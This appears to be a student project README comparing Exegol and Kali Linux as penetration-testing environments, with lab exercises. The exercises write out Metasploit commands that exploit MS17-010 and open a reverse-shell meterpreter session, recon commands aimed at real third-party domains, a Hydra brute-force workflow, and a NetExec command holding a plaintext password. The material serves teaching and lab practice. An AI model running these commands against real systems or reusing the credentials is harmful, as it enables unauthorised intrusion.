# Exegol VS Kali Linux
By Favre Julien, Le Meillour Anthony, Meichtry Joel, and Pfaffen Kelvin

# Table of content
1. [**Disclaimer**](#disclaimer)
2. [**Introduction**](#introduction)
   - [Objectives](#objectives)
   - [Topic Selected](#topic-selected)
3. [**Background Information**](#background-information)
   - [Ethical Hacking](#ethical-hacking)
   - [Role of Kali Linux in Ethical Hacking](#role-of-kali-linux-in-ethical-hacking)
   - [Importance of Docker and Virtual Machines](#importance-of-docker-and-virtual-machines)
4. [**Exegol**](#exegol)
   - [Introduction](#introduction-1)
   - [Get Started](#get-started)
5. [**Kali Linux**](#kali-linux)
   - [Introduction](#introduction-2)
   - [Get Started](#get-started-1)
   - [Kali Linux Docker Overview](#kali-linux-docker-overview)
     - [Get Started](#get-started-2)
6. [**Tools Overview**](#tools-overview)
7. [**Case Studies**](#case-studies)
   - [Exegol Exercises](#exegol-exercises)
     - [Internal Pentesting](#internal-pentesting)
     - [Other Tools](#other-tools)
   - [Kali Linux Exercises](#kali-linux-exercises)
     - [Purpose](#purpose)
     - [Steps done by the script](#steps-done-by-the-script)
     - [Steps on Kali Linux (VM)](#steps-on-kali-linux-vm)
     - [Steps on Kali Linux (Docker)](#steps-on-kali-linux-docker)
8. [**Comparison: Docker (Exegol) vs. VM (Kali Linux) for Penetration Testing**](#comparison-docker-exegol-vs-vm-kali-linux-for-penetration-testing)
   - [From a Student's Perspective](#from-a-students-perspective)
   - [From a Professional's Perspective](#from-a-professionals-perspective)
9. [**Justification for the Best Choice**](#justification-for-the-best-choice)
10. [**Conclusion**](#conclusion)
11. [**References**](#references)

## Disclaimer

This project is designed for educational purposes only. The tools, techniques, and methodologies discussed and utilized herein are intended to promote cybersecurity education and awareness. Ethical hacking should only be conducted within legal boundaries and with explicit permission. Always ensure you have authorization before engaging in any form of security testing. The creators of this project assume no liability for misuse of the information or tools provided. By proceeding, you acknowledge the importance of ethical conduct in cybersecurity and commit to using this knowledge responsibly.

## Introduction
### Objectives

To discover and transmit emerging technologies to our colleagues and professors.

### Topic Selected

The topic we chose is the following: Exegol vs Kali Linux. We aim to compare both toolboxes for penetration testing projects and determine which one is the best.

## Background Information
### Ethical Hacking

Ethical hacking plays a crucial role in cybersecurity practices. It involves authorized attempts to bypass system security to identify potential vulnerabilities and weaknesses. Furthermore, by simulating real-world attack scenarios, this practice helps organizations strengthen their defenses and protect against malicious cyber threats.

### Role of Kali Linux in Ethical Hacking

Kali Linux is a Debian-based Linux distribution designed specifically for the security testing of computer systems and networks. It offers a wide range of tools dedicated to cybersecurity, tailored for ethical hacking purposes.

### Importance of Docker and Virtual Machines

Docker and virtual machines play essential roles in software development and cybersecurity environments. Docker facilitates the deployment of applications within lightweight, isolated containers, allowing for efficient resource utilization and seamless scalability.

Virtual machines enable the creation of virtualized environments that replicate physical hardware, providing a flexible and efficient means of running multiple operating systems and applications on a single physical machine.

## Exegol

### Introduction
Exegol is a community-driven hacking environment, powerful and yet simple enough to be used by anyone in day to day engagements.

Exegol fits pentesters, CTF players, bug bounty hunters, researchers, beginners and advanced users, defenders, from stylish macOS users and corporate Windows pros to UNIX-like power users.

### Get Started
- Download a virtualization software application
    - [WMWare Workstation Player](https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html).
    - [Oracle VM VirtualBox](https://www.virtualbox.org/wiki/Downloads)

- Install [Ubuntu](https://ubuntu.com/download/desktop) as your Virtual machine for pentesting with metasploit

- Install [Windows XP](https://archive.org/details/WinXPProSP3x86) as your Virtual machine for pentesting with metasploit
    - host-only network

- Install [Exegol](https://exegol.readthedocs.io/en/latest/getting-started/install.html) on Ubuntu

> **Note**
>
> We use Ubuntu, because in the Exercise that uses Metasploit Framework we need to use internal pentesting. For that it's highly recommended to set it up on a Linux host. This is because Docker Desktop on Windows and macOS may lack certain features. This is mainly because these operating systems run Docker containers within an internal VM, which doesn’t fully integrate with the host's network interfaces and USB accessories.

## Kali Linux

### Introduction

Kali Linux comes pre-installed with numerous penetration testing and security auditing tools that cover various aspect of cybersecurity, such as network scanning, password cracking, vulnerability assessment, and web application testing. Additionnally, the distribution is regularly updated to incorporate the latest improvements.

Kali Linux offers customization and flexibility to suit individual needs.

Finally, this distribution boasts an active community of cybersecurity professionals and researchers who contribute to its development, offering support and sharing knowledge. 

### Get Started

- Download a virtualization software application
    - [WMWare Workstation Player](https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html).
    - [Oracle VM VirtualBox](https://www.virtualbox.org/wiki/Downloads)

- Install [Kali Linux](https://www.kali.org/get-kali/#kali-platforms)
    - Choose the "Virtual Machine" option.
    - Select on which virtualization software application you want to import Kali Linux and click on "Recommended".
    - The login and the password are the same: kali

- Install [Metasploitable 2](https://sourceforge.net/projects/metasploitable/#:~:text=Metasploitable%20is%20an%20intentionally%20vulnerable%20Linux%20virtual%20machine.,and%20password%20is%20msfadmin%3Amsfadmin.)
    - The login and the password are the same: msfadmin

### Kali Linux Docker Overview

Kali Linux, in its Dockerized form, starts as a minimal base system, derived from Debian, that provides the core functionalities of Kali Linux without the additional tools pre-installed. This approach allows users to customize their Kali Linux environment to their specific needs by installing only the tools they require. For this project, we've taken the initiative to create a Docker image that includes the `kali-linux-headless` metapackage. This metapackage is a comprehensive collection of penetration testing tools that are essential for network analysis, vulnerability scanning, web application testing, and more, offering a robust toolkit for a wide array of cybersecurity tasks.

The `kali-linux-headless` package is designed for scenarios where a graphical user interface is unnecessary or undesirable, making it perfect for remote operations, automated tasks, and environments where system resources are at a premium.

#### Get Started

1. **Install docker desktop**: 
    - Download [Docker Desktop](https://www.docker.com/products/docker-desktop/)
    - Install Docker Desktop

2. **Download Our Custom Docker Image**: We've pre-packaged a Docker image with the `kali-linux-headless` metapackage, configured for the specific needs of this project. Pull this image from the Docker Hub using the following command:
    ```
    docker pull favju/kali-linux-headless:latest
    ```
    This command fetches our custom image, ensuring you have a ready-to-use Kali Linux environment.

3. **Run the Docker Container**: With the image pulled, initiate a Docker container to start your Kali Linux session:
    ```
    docker run -it favju/kali-linux-headless:latest
    ```
    This will open an interactive shell within the Docker container, placing you directly into the Kali Linux environment we've set up.

4. **Begin Your Penetration Testing**: Now within the Dockerized Kali Linux environment, you're ready to launch your penetration testing tools and begin your cybersecurity tasks. The environment is pre-configured with a comprehensive set of tools, allowing you to dive straight into testing without additional setup.

## Tools Overview

The project utilizes a variety of tools for penetration testing and cybersecurity analysis. Each tool serves a specific purpose, ranging from network exploration to password cracking and security auditing. Below is an overview of the tools used in this project:

- **Nmap**: A network exploration tool and security auditor.
- **Hydra**: A fast and flexible password cracking tool.
- **Sshpass**: A utility for non-interactive SSH session password authentication.
- **JWT_tool**: A toolkit for testing, tampering, and crafting JWTs.
- **SimplyEmail**: A tool for querying and analyzing email addresses.
- **Responder**: A network tool for identifying and exploiting various network protocols.
- **theHarvester**: A tool for open-source intelligence (OSINT) gathering.
- **CloudFail**: A tool for uncovering hidden IP addresses behind the Cloudflare network.
- **WAFW00F**: A tool for detecting and identifying Web Application Firewalls (WAF).
- **Waybackurls**: A tool for fetching known URLs from the Wayback Machine for a domain.
- **NetExec**: A tool for remotely executing commands on networked systems.
- **Metasploit Framework**: A framework for developing and executing exploit code against a remote target machine.

## Case studies
### Exegol exercices
#### Internal Pentesting with [Metaploit Framework](https://github.com/rapid7/metasploit-framework)
- For testing metasploit the Ubuntu needs to be in Host-only network mode
    - The following command checks​ if the target machine has vulnerabilities on smb_ms17_010​. You need to set the IP address of your target machine in rhosts.
    ```
    nmap [IP target machine]​
    msfconsole​
    grep scanner search smb​
    use auxiliary/scanner/smb/smb_ms17_010​
    set rhosts [IP target machine]​
    run​
    ```
    - The following command exploits the target machine on ms17_010_psexec. You need to set the IP address of your target machine in rhosts. You also need to set the IP address of your host machine as your lhost.
    ```
    msfconsole​
    use exploit/windows/smb/ms17_010_psexec 
    set payload windows/meterpreter/reverse_tcp​
    set rhosts [IP target machine]​
    set lhost [IP host machine]​
    exploit​
    ```
#### Other tools
- For the following exerises you need to have access to the internet.
    - Commands that uses a python module
        - You can run the following command to test the [jwt tool](https://github.com/ticarpi/jwt_tool). The jwt command is used for scanning the application to hunt for common misconfigurations with the provided tocken.
        ```
        jwt_tool.py  -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb
        ```

        - You can run the following command to test the [SimplyEmail tool](https://simplysecurity.github.io/SimplyEmail/). The command uses all non API methods to obtain Emails from the doamin "cybersyndicates.com".
        ```
        SimplyEmail.py -all -e cybersyndicates.com
        ```

        - You can run the following command to test the [Responder tool](https://github.com/lgandx/Responder). The command will handle proxy authentication using NTLM or basic authentication methods as specified, without relying on WPAD.
        You need to set an interface of your machine. See the interfaces with the command ip address. 
        ```
        Responder.py -I [an interface of your machine] -w -d
        ```

        - You can run the following command to test the  [theHarvester tool](https://github.com/laramies/theHarvester/wiki/). The command searches for email addresses associated with the domain "geeksforgeeks.org", limits the results to 500, and utilizes yahoo as the search engine.
        ```
        theHarvester.py -d geeksforgeeks.org -l 500 -b yahoo
        ```

        - You can run the following command to test the [CloudFail tool](https://github.com/m0rtem/CloudFail). The command scans the dns, Crimeflare.com database und subdomains of the domain "seo.com". 
        ```
        cloudfail.py --target seo.com
        ```
    - Command that can be automised with a script
        - You can run the following command to test the [wafw00f tool](https://github.com/EnableSecurity/wafw00f). The command detects the number of firewalls of the url "https://example.org".
        ```
        wafw00f https://example.org
        ```

        - You can run the following command to test the [wayback machine](https://github.com/tomnomnom/waybackurls). The command fetches known URLs from the Wayback Machine for the domain "myuniversity.com".
        ```
        waybackurls myuniversity.com
        ```

        - You can run the following command to test the [subfinder tool](https://docs.projectdiscovery.io/tools/subfinder/running). The comamnd finds subdoamins from the domain "hackerone.com".
        ```
        subfinder -d hackerone.com
        ```

        - You can run the following commands to test the [netexec tool](https://www.netexec.wiki/). The command with ssh allow a ssh connection with a sFTP server. The command with smb connects with SMB File Server and list all readable file in a json file in the output folder "/workspace". The last command cat reads the json file.
        ```
        netexec ssh 10.130.25.152 -u 'Student' -p '3uw.AQ!SWxsDBm2zi3'
        netexec smb 10.130.25.152 -u 'Student' -p '3uw.AQ!SWxsDBm2zi3' -M spider_plus -o OUTPUT_FOLDER=/workspace
        cat 10.130.25.152.json
        ```
        - To run all the commands form the tools wafw00f, waybackurls, subfinder and netexec, you need to run the script "exegol.sh" with sh exegol.sh in exegol.

### Kali linux exercices
#### Purpose
The purpose to demonstrate the different tools used during a penetration test is the following: establish an SSH connection to a remote machine from a local machine. For our case, the remote machine is Metasploitable 2.

#### Steps done by the script
1. Get Local IP address with **ifconfig**:
    - Retreive the IP address of the local machine's Ethernet interface (eth0).
    - Specify the subnet mask for the next step.

2. Network scan with **Nmap**:
    - Make an Nmap scan to identify devices within the local network.
    - Furthermore we look for devices with open ports 22 (SSH) and 80 (HTTP).
    
3. Credential Testing with **Hydra**:
    - Based on lists of usernames passwords, this tool will search and discover the credentials of the target machine.

4. SSH Connection with **sshpass**:
    - Provide username, password and IP address discovered during the previous steps to establish the ssh connection to the target machine.

#### Steps on Kali Linux (VM)
- Open Kali Linux on your virtualization software application.

- Install **sshpass** on Kali Linux to be able to make an ssh connection. By default sshpass is not installed. Run the following command:
```
apt-get install sshpass
```

- Once the previous installation is done you can power off Kali Linux.

> **WARNING**  Before executing the penetration tests, change the Network Adapter to be in Host-only for Kali Linux and Metasploitable 2. 
> ![networkSetting](Documents/Images/NetworkSetting.png)

- Power on Kali Linux and Metasploitable 2.

- Copy the script named pentest.sh located in Code\Scripts and paste it in Kali Linux.

- Open a terminal and type ```kali-tweaks```, select **Hardening Settings** and check **SSH client** by pressing "Enter". Apply the modification. Then go to ***Network Repositories** and check **bleeding-edge** and **experimental**. Apply the modificationa and quit.

- Run the following command: ```service ssh start```

- Run the script by typing
```
./pentest.sh
```

- If you encounter this message:  ```zsh: permission denied: ./pentest.sh```
    - Run the following command to add execute permission to the pentest.sh file. Then run again the script.

    ```
    chmod +x pentest.sh
    ```

#### Steps on Kali Linux (Docker)
- Go to kali-docker folder in a cmd
- Execute the docker-setup.bat: ``` ./docker-setup.bat ```
    - will automatically:
        - pull the image
        - create network
        - run containers

- In kali container you need to execute ```sed -i 's/\r$//' dockerPentest.sh```
- In the kali container you can execute the script with: ``` bash dockerPentest.sh ```

## Comparison: Docker (Exegol) vs. VM (Kali Linux) for Penetration Testing

### From a Student's Perspective

**Docker (Exegol)**
- **Advantages**: 
    - Quick setup and low resource consumption make Docker containers ideal for students who may not have access to high-end hardware.
    - Easier to share and replicate environments across different machines, ensuring consistency in learning and testing.
- **Disadvantages**: 
    - Limited by the Docker engine's compatibility with the host system, which can sometimes introduce complexity in accessing hardware or network interfaces directly.
    - Exegol's limited documentation can present a steep learning curve for students, potentially restricting their ability to fully leverage the platform's capabilities for educational purposes.

**VM (Kali Linux)**
- **Advantages**: 
    - Provides a more comprehensive emulation of a real operating system, which can be beneficial for learning about system internals and more complex penetration testing scenarios.
    - More straightforward access to hardware and network interfaces, allowing for a wider range of tests and experiments.
- **Disadvantages**: 
    - Higher resource consumption, which may not be ideal for students with less powerful computers.
    - Setup and configuration can be more time-consuming compared to Docker containers.

### From a Professional's Perspective

**Docker (Exegol)**
- **Advantages**: 
    - Rapid deployment and scalability are key for professionals managing multiple projects or needing to quickly adapt to different testing environments.
    - Isolation of environments in containers can enhance security and reduce the risk of cross-contamination between projects.
- **Disadvantages**: 
    - Networking can be more complex to manage within Docker, potentially complicating tests that require intricate network setups.

**VM (Kali Linux)**
- **Advantages**: 
    - A closer representation of real-world systems, providing professionals with a more accurate environment for testing and exploitation.
    - Easier integration with enterprise-grade hardware and networking configurations.
- **Disadvantages**: 
    - Resource-intensive, requiring more powerful hardware for optimal performance, which can increase operational costs.
    - Longer setup times can slow down the pivot to new projects or testing scenarios.


## Justification for the best choice

Given the specific objectives and requirements of students and professionals in the field of penetration testing, selecting the optimal environment—whether Docker (Exegol) or a Virtual Machine (Kali Linux)—requires a nuanced understanding of each option's strengths and limitations.

For students, the accessibility and wealth of resources associated with Kali Linux, combined with its straightforward network configuration capabilities, present a compelling case. The abundance of tutorials and documentation available online facilitates a smoother learning curve, allowing students to focus more on mastering penetration testing techniques and less on setup intricacies.

Conversely, for professionals whose priorities lean towards efficiency, scalability, and isolation, Dockerized environments, exemplified by Exegol, offer significant advantages. These environments enable rapid deployment, easy automation, and effective segregation of projects, enhancing both security and productivity. The ability to quickly adapt and configure testing environments to suit specific project needs—without the overhead of VM's resource consumption—can significantly accelerate workflows in professional settings.

However, it is crucial for professionals considering Docker or Exegol to navigate the complexities of network configurations and ensure they possess, or can access, the requisite knowledge to fully exploit these environments. The trade-off between the ease of use offered by VMs and the advanced, scalable capabilities of Dockerized environments must be carefully evaluated in the context of the project requirements, available resources, and technical expertise.

In summary, while Kali Linux on a VM stands out as the go-to option for educational purposes and beginners due to its user-friendliness and extensive support resources, Docker (Exegol) represents a powerful alternative for professionals seeking to optimize their penetration testing processes. This choice emphasizes the importance of aligning technical solutions with the user's skill level, project demands, and desired outcomes, ensuring that the selected environment maximally contributes to the effectiveness and efficiency of the cybersecurity endeavors.

## Conclusion

In the realm of cybersecurity education and professional practice, the choice between Docker (Exegol) and VM (Kali Linux) environments for penetration testing depends on specific needs, resources, and objectives. 

## References
- Documentations used during the project:
    - [Nmap](https://www.geeksforgeeks.org/nmap-command-in-linux-with-examples/)
    - [Hydra](https://www.freecodecamp.org/news/how-to-use-hydra-pentesting-tutorial/)
    - [sshpass](https://www.cyberciti.biz/faq/noninteractive-shell-script-ssh-password-provider/) 
    - [jwt tool](https://github.com/ticarpi/jwt_tool)
    - [SimplyEmail tool](https://simplysecurity.github.io/SimplyEmail/)
    - [Responder tool](https://github.com/lgandx/Responder)
    - [theHarvester tool](https://github.com/laramies/theHarvester/wiki/)
    - [CloudFail tool](https://github.com/m0rtem/CloudFail)
    - [wafw00f tool](https://github.com/EnableSecurity/wafw00f)
    - [wayback machine](https://github.com/tomnomnom/waybackurls)
    - [netexec tool](https://www.netexec.wiki/)
    - [Metaploit Framework](https://github.com/rapid7/metasploit-framework)